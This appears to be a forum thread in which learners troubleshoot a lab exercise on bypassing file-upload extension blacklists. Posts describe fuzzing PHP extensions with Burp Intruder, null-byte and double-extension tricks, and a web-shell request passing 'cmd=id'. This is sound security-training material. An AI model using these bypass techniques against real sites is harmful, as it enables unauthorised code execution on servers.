FILE UPLOAD ATTACKS: Blacklist Filters

Hello everyone!
Faced issue when can’t pass this task. What was done:

  • Created file for injection to know where is page:
<?php echo 'Backdoor is here!!!'; ?>
  • Intercepted request with Burp → go to Intruder. Tried all php extentions: php, phps, php3, php4, php5, phtml, phtm. Only php, phps, php5 and phtml are blocked on the server. Tried to use others - file uploads, but page doesn’t show my output → file is there but doesn’t execute on server

  • Tried Intruder with other methods: pHp, php%00, php\x00 - doesn’t work and I don’t know how to send requests for files with %00 extention, etc…

Do you have any hints/ideas what to try and what I’m doing wrong?

2 Likes

Hope you got the answer by now… Just incase you haven’t try and make use of the cheat sheet resources.

PHP Extensions

Make use of this extension list as your intruder payload. Also make sure to untick URL encoding. After uploading you can use intruder again to look for the files you have uploaded. See which extension gives you back the result you were expecting.

Hope this is helpful…
Happy Hacking!!!

3 Likes

Thank you for a good tip!
My error was in not using this list + I haven’t used Intruder during perform of GET request. Now found working extention, thank you :slight_smile:

1 Like

hey i am curious what you mean by “intruder with GET request” because i am only seeing a POST being able to be run the attack on. Also i am having trouble, i used the list he said and i am still not seeing them reflected in the server.

Hi!
We’re using POST request to upload our file, but to exploit it, we have to use GET request with path to our file.
Please describe how you’re using Burp, have you disabled URL encoding of request, etc
For me, the biggest problem was there :slight_smile: Php extention can be easily found from that list above or you can create that list with additional characters as in my first message in the thread

Hi,

I have identified the extension, which are not blocked, but the PHP code is not executing, could please give me some hint.

1 Like

I had a lot of problems with this task. Eventually, after many resets of the machine, it started working.

If anybody is stuck, I will try to assist you. Just shoot me a message.

John

I’m confused. I fuzzed with ffuf and Burp and I tired different extensions

Summary

php4,php2,php.jpg

I was able to upload them but they couldn’t be executed.

Summary

shell1.php.jpg?cmd=id” cannot be displayed because it contains errors.

I am also getting the same issue, after fuzz the extensions, so many successful extensions is getting uploaded but when we call the file, the file is downloading instead of executing PHP code, I tried with PHP hello world code also.

<?php echo "Hello world" ?>

The file is uploading but not executing the PHP code, I tried so many times from so many days but still I am getting same issue.

Same issue here. When I upload the file with a good extension, the response doesn’t execute php code, only show the php code.